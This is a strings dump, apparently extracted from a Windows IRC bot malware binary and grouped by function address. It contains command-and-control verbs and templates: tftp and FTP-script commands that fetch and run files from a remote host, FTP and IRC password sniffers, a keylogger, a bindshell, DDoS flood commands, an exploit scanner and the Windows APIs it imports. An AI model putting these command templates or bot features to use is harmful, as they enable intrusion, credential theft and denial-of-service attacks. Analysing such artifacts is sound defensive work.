sub_419443(0456):
	"Account: %S"
	"Full Name:	%S"
	"User Comment: %S"
	"Comment: %S"
	"Unknown"
	"Administrator"
	"User"
	"Guest"
	"Privilege Level: %s"
	"Auth Flags: %d"
	"Home Directory: %S"
	"Parameters: %S"
	"Password Age: %d"
	"Bad Password Count: %d"
	"Number of Logins: %d"
	"Last Logon: %d"
	"Last Logoff: %d"
	"Logon Server: %S"
	"Country	Code: %d"
	"User's Language: %d"
	"Max. Storage: %d"

sub_40C3E8(05a7):
	"sym"

sub_40E292(0616):
	"tftp -i %s get %s\r\n"
	"echo open %s %d > o&echo user	1 1 >> o "...

sub_41875E(0703):
	"mIRC"

sub_413079(078a):
	"FTP	sniff"
	"#FAAK#"
	"NICK	"
	"220 "
	"230 "
	"USER	"
	"PASS	"

sub_40E9FB(0ba8):
	WS2_32.recv

	"cmd /c echo open %s %d >> ii &echo user"...

sub_413003(0d1f):
	"IRC	sniff"
	"#FAAK#"
	"OPER	"
	"NICK	"
	"oper	"
	"You are now an IRC Operator"

sub_41A6EA(2156):
	"Software\\Microsoft\\OLE"
	"EnableDCOM"
	"SYSTEM\\CurrentControlSet\\Control\\Lsa"
	"restrictanonymous"
	"%c$"
	"%c:\\"

sub_40C2AF(22a3):
	"%d.%d.%d.%d"

sub_4191DB(3fe3):
	"Share	name:	 Resource:		 "...
	"Yes"
	"No"
	"%-14S %-24S %-6u %-4s"

sub_41ABFB(4107):
	"www.schlund.net"
	"www.utwente.nl"
	"verio.fr"
	"www.1und1.de"
	"www.switch.ch"
	"www.belwue.de"
	"de.yahoo.com"
	"www.google.it"
	"www.xo.net"
	"www.stanford.edu"
	"www.verio.com"
	"www.nocster.com"
	"www.rit.edu"
	"www.cogentco.com"
	"www.burst.net"
	"nitro.ucsc.edu"
	"www.level3.com"
	"www.above.net"
	"www.easynews.com"
	"www.google.com"
	"www.lib.nthu.edu.tw"
	"www.st.lib.keio.ac.jp"
	"www.d1asia.com"
	"www.nifty.com"
	"yahoo.co.jp"
	"www.google.co.jp"

sub_401ACD(41ca):
	" :"
	" "
	"!"
	"PING"
	"PONG	%s\r\n"
	"JOIN	%s %s\r\n"
	"001"
	"005"
	"302"
	"@"
	"433"
	"NICK	%s\r\n"
	"KICK"
	"NOTICE %s :%s\r\n"
	"JOIN	%s %s\r\n"
	"NICK"
	":%s%s"
	"PART"
	"QUIT"
	"353"
	"PART"
	"NOTICE %s :%s\r\n"
	"PRIVMSG"
	"NOTICE"
	"SEND"
	"%s"
	"CHAT"
	"%s"
	"c"
	"k"
	" :"
	"$%d-"
	"$%d"
	"$me"
	"$user"
	"$chan"
	"$rndnick"
	"$server"
	"$chr("
	")"
	"63"
	" "
	" "
	"rndnick"
	"rn"
	"di3"
	"di3"
	"logout"
	"lo"
	"version"
	"ver"
	"rulez"
	"rz"
	"speedtest"
	"st"
	"secure"
	"sec"
	"unsecure"
	"unsec"
	"bindshell"
	"bd"
	"Server"
	"socks4"
	"s4"
	"socks4stop"
	"Server"
	"rloginstop"
	"Server"
	"httpstop"
	"Server"
	"logstop"
	"redirectstop"
	"synstop"
	"skysynstop"
	"targa3stop"
	"wonkstop"
	"packetstop"
	"tsunamistop"
	"wisdomstop"
	"udpstop"
	"pingstop"
	"tftpstop"
	"Server"
	"findfilestop"
	"ffstop"
	"procsstop"
	"psstop"
	"clonestop"
	"Clone"
	"securestop"
	"Secure"
	"scanstop"
	"Scan"
	"scanstats"
	"stats"
	"trstats"
	"connectbackstats"
	"cbstats"
	"exploitlist"
	"explist"
	"reconnect"
	"r"
	"disconnect"
	"dc"
	"quit"
	"q"
	"status"
	"s"
	"id"
	"i"
	"r3start"
	"threads"
	"t"
	"aliases"
	"al"
	"log"
	"lg"
	"clearlog"
	"clg"
	"netinfo"
	"ni"
	"sysinfo"
	"si"
	"KOSOMAKY4D"
	"KOSOMAKY4D"
	"procs"
	"ps"
	"uptime"
	"up"
	"driveinfo"
	"drv"
	"testdlls"
	"dll"
	"opencmd"
	"ocmd"
	"cmdstop"
	""
	"%d. %s"
	"spoof"
	"off"
	"getclip"
	"gc"
	"flusharp"
	"farp"
	"flushdns"
	"fdns"
	"currentip"
	"cip"
	"rloginserver"
	"rlogin"
	"httpserver"
	"http"
	"tftpserver"
	"tftp"
	"shitycrash"
	"shitycrash"
	"asc"
	"as"
	"phonehome"
	"NOTICE %s :PHONING HOME: DADI	Are You	T"...
	"findpass"
	"fp"
	"#f"
	"#f"
	"Random"
	"Sequential"
	"full"
	"%s"
	"saadfgh"
	"QUIT	:%s\r\n"
	"QUIT :later\r\n"
	"QUIT :disconnecting\r\n"
	"QUIT :reconnecting\r\n"
	"secure"
	"sec"
	"Unsecuring"
	"abosel7 v4"
	"get"
	"%d.%d.%d.*"
	"exploit"
	"#f"
	"#f"
	"reconnect.in"
	"rin"
	"reconnect.in.ms"
	"rinms"
	"flood"
	"load"
	" "
	" "
	"nt"
	" "
	"notice %s	:%s"
	"mode"
	" "
	"mode	%s %s"
	"join"
	"join	%s"
	"part"
	"part	%s"
	"partflood"
	"part	%s %s"
	"pnick"
	"join	%s"
	"part	%s %s"
	"join	%s"
	"part	%s %s"
	"join	%s"
	"part	%s %s"
	"nick"
	"join	%s"
	"chgnick"
	"msg"
	"join	%s"
	"notice"
	"join	%s"
	"NOTICE %s	:%s"
	"NOTICE %s	:%s"
	"NOTICE %s	:%s"
	"ctcp"
	"join	%s"
	"mix"
	"join	%s"
	"NOTICE %s	:%s"
	"PRIVMSG %s :%s"
	"NOTICE %s	:%s"
	"register"
	"nickserv register %s %s"
	"off"
	"nick"
	"n"
	"join"
	"j"
	"part"
	"pt"
	"raw"
	"r"
	"killthread"
	"k"
	"c_quit"
	"c_q"
	"c_rndnick"
	"c_rn"
	"prefix"
	"pr"
	"open"
	"o"
	"server"
	"se"
	"dns"
	"dn"
	"killproc"
	"kp"
	"kill"
	"ki"
	"delete"
	"del"
	"get"
	"gt"
	"list"
	"li"
	"visit"
	"v"
	"mirccmd"
	"mirc"
	"cmd"
	"cm"
	"readfile"
	"rf"
	"psniff"
	"on"
	"#f"
	"off"
	"sniffer"
	"on"
	"#f"
	"off"
	"ident"
	"on"
	"off"
	"keyloger"
	"keylog"
	"stop"
	"stop"
	"net"
	"start"
	"stop"
	"pause"
	"continue"
	"delete"
	"%s"
	"share"
	"user"
	"send"
	"gethost"
	"gh"
	"killlog"
	"kl"
	"addalias"
	"aa"
	"privmsg"
	"action"
	"a"
	"cycle"
	"cy"
	"mode"
	"m"
	"c_raw"
	"c_r"
	"c_mode"
	"c_m"
	"c_nick"
	"c_n"
	"c_join"
	"c_j"
	"c_part"
	"c_p"
	"targa3"
	"t3"
	"tsunami"
	"tsn"
	"repeat"
	"rp"
	"delay"
	"de"
	"HADETH3"
	"HADETH3"
	"execute"
	"e"
	"findfile"
	"ff"
	"rename"
	"mv"
	"icmpflood"
	"icmp"
	"clone"
	"c"
	"ddos.syn"
	"ddos.ack"
	"ddos.random"
	"wisdom.udp"
	"synflood"
	"syn"
	"skysyn"
	"phatwonk"
	"wonk"
	"NAZEL3"
	"NAZEL3"
	"redirect"
	"rd"
	"scan"
	"sc"
	"c_privmsg"
	"c_pm"
	"c_action"
	"c_a"
	"portscan"
	"psc"
	"advscan"
	"ad"
	"udpflood"
	"udp"
	"u"
	"netsend"
	"ns"
	"pingflood"
	"ping"
	"p"
	"vnchost"
	"VNC: HTTP Host Changed To: %s"
	"tcpflood"
	"tcp"
	"email"
	" "
	"helo $rndnick\nmail from: <%s>\nrcpt to: "...
	"httpcon"
	"hcon"
	"syn"
	"ack"
	"random"
	"Spoofed"
	"Normal"
	"ICMP.dll not available"
	"upload"
	"%s\\%i%i%i.dll"
	"ab"
	"open %s\r\n%s\r\n%s\r\n%s\r\nput %s\r\nbye\r\n"
	"-s:%s"
	"ftp.exe"
	"open"
	"#f"
	"Random"
	"Sequential"
	"[%s]	* %s %s"
	"[%s]	<%s> %s"
	"saadfgh"
	"%s%s.exe"
	"repeat"
	"MODE	%s\r\n"
	"JOIN	%s %s\r\n"
	"Keylog"
	"VrX v3.0 sites keylogger active."
	"Keyloger Already running."
	"web"
	"#f"
	"VrX v3.0 sites keylogger active."
	"normal"
	"#f"
	"Normal key logger active."
	"Failed to start logging thread, error: "...
	"Unknow mode type."
	"r"
	"\n"
	"%s"
	"open"
	"QUIT :later\r\n"
	"all"
	"JOIN	%s %s\r\n"
	"NICK	%s\r\n"
	"QUIT :reconnecting\r\n"
	"QUIT :reconnecting\r\n"
	"NICK	%s\r\n"
	"!"
	"~"
	"cool"
	"NOTICE %s :Pass auth failed (%s!%s).\r\n"
	"NOTICE %s :Your attempt has been logged"...
	"NOTICE %s :Host Auth failed (%s!%s).\r\n"
	"NOTICE %s :Your attempt has been logged"...
	"cool"
	"USERHOST %s\r\n"
	"-x+i"
	"MODE %s %s\r\n"
	"JOIN	%s %s\r\n"

sub_41ADD8(423a):
	"%dd %dh %dm"

sub_401000(4800):
	"Windos Seres Agnts"

sub_409909(4984):
	"kernel32.dll"
	"SetErrorMode"
	"CreateToolhelp32Snapshot"
	"Process32First"
	"GetDiskFreeSpaceExA"
	"GetLogicalDriveStringsA"
	"SearchPathA"
	"QueryPerformanceCounter"
	"QueryPerformanceFrequency"
	"RegisterServiceProcess"
	"user32.dll"
	"SendMessageA"
	"FindWindowA"
	"IsWindow"
	"GetClipboardData"
	"CloseClipboard"
	"GetAsyncKeyState"
	"GetKeyState"
	"GetWindowTextA"
	"GetForegroundWindow"
	"advapi32.dll"
	"RegCreateKeyExA"
	"RegSetValueExA"
	"RegQueryValueExA"
	"RegDeleteValueA"
	"RegCloseKey"
	"ClearEventLogA"
	"OpenProcessToken"
	"LookupPrivilegeValueA"
	"AdjustTokenPrivileges"
	"OpenSCManagerA"
	"OpenServiceA"
	"ControlService"
	"CloseServiceHandle"
	"EnumServicesStatusA"
	"IsValidSecurityDescriptor"
	"GetUserNameA"
	"gdi32.dll"
	"CreateDCA"
	"CreateDIBSection"
	"CreateCompatibleDC"
	"GetDIBColorTable"
	"SelectObject"
	"BitBlt"
	"DeleteDC"
	"DeleteObject"
	"ws2_32.dll"
	"WSAStartup"
	"WSASocketA"
	"WSAAsyncSelect"
	"__WSAFDIsSet"
	"WSAIoctl"
	"WSAGetLastError"
	"WSACleanup"
	"socket"
	"ioctlsocket"
	"connect"
	"inet_ntoa"
	"inet_addr"
	"htons"
	"htonl"
	"ntohs"
	"ntohl"
	"send"
	"sendto"
	"recv"
	"recvfrom"
	"bind"
	"select"
	"listen"
	"accept"
	"setsockopt"
	"getsockname"
	"gethostname"
	"getpeername"
	"closesocket"
	"wininet.dll"
	"InternetGetConnectedState"
	"InternetGetConnectedStateEx"
	"HttpOpenRequestA"
	"HttpSendRequestA"
	"InternetConnectA"
	"InternetOpenUrlA"
	"InternetCrackUrlA"
	"InternetReadFile"
	"InternetCloseHandle"
	"Mozilla/4.0 (compatible)"
	"icmp.dll"
	"IcmpCreateFile"
	"IcmpCloseHandle"
	"IcmpSendEcho"
	"netapi32.dll"
	"NetShareAdd"
	"NetShareDel"
	"NetShareEnum"
	"NetScheduleJobAdd"
	"NetApiBufferFree"
	"NetRemoteTOD"
	"NetUserAdd"
	"NetUserDel"
	"NetUserEnum"
	"NetUserGetInfo"
	"NetMessageBufferSend"
	"NetWkstaGetInfo"
	"dnsapi.dll"
	"DnsFlushResolverCache"
	"DnsFlushResolverCacheEntry_A"
	"iphlpapi.dll"
	"DeleteIpNetEntry"
	"mpr.dll"
	"WNetAddConnection2A"
	"WNetAddConnection2W"
	"WNetCancelConnection2A"
	"WNetCancelConnection2W"
	"shell32.dll"
	"SHChangeNotify"
	"odbc32.dll"
	"SQLDriverConnect"
	"SQLAllocHandle"
	"avicap32.dll"
	"capCreateCaptureWindowA"
	"capGetDriverDescriptionA"

sub_418AF1(4d20):
	"netapi32.dll"
	"NetMessageBufferSend"

sub_40ADE1(4ec8):
	"mIRC"

sub_422279(502f):
	"e+000"

sub_416DD9(5886):
	"%sKB"
	"failed"

sub_418699(5bd7):
	"%s	Error: %s <%d>."

sub_40D4E2(5f99):
	"GET /	HTTP/1.0\r\nHost: %s\r\nAuthorization"...

sub_426173(5fbb):
	"invalid string position"

sub_425029(60f6):
	"user32.dll"
	"MessageBoxA"
	"GetActiveWindow"
	"GetLastActivePopup"

sub_425973(6338):
	"1#SNAN"
	"1#IND"
	"1#INF"
	"1#QNAN"

sub_418D2A(6353):
	"The specified	service	name is	invalid."
	"The requested	control	code is	undefined"...
	"The handle is	invalid."
	"The handle does not have the required	a"...
	"The service binary file could	not be fo"...
	"The service cannot be	stopped	because	o"...
	"The database is locked."
	"A thread could not be	created	for the	s"...
	"The process for the service was started"...
	"The requested	control	code is	not valid"...
	"An instance of the service is	already	r"...
	"The system is	shutting down."
	"An unknown error occurred: <%ld>"

sub_4131EC(6fdf):
	WS2_32.htons

	"%s"
	"%s"

sub_40B90E(7139):
	" Total: %d in %s."

sub_412EEC(79f8):
	"Bot	sniff"
	"#FAAK#"
	"[PSNIFF]:"
	"PSNIFF//"
	"JOIN	#"
	"302 "
	"366 "
	":.login"
	":!login"
	":!Login"
	":.Login"
	":.ident"
	":!ident"
	":.hashin"
	":!hashin"

sub_417E84(7aa9):
	"-|`_\\{[]}"
	"-|`_\\{[]}"
	"-|`_\\{[]}"
	"-|`_\\{[]}"

sub_41036B(7f62):
	"\n"
	"PRIVMSG %s :Searching	for: %s\r\n"
	"\r\n\r\n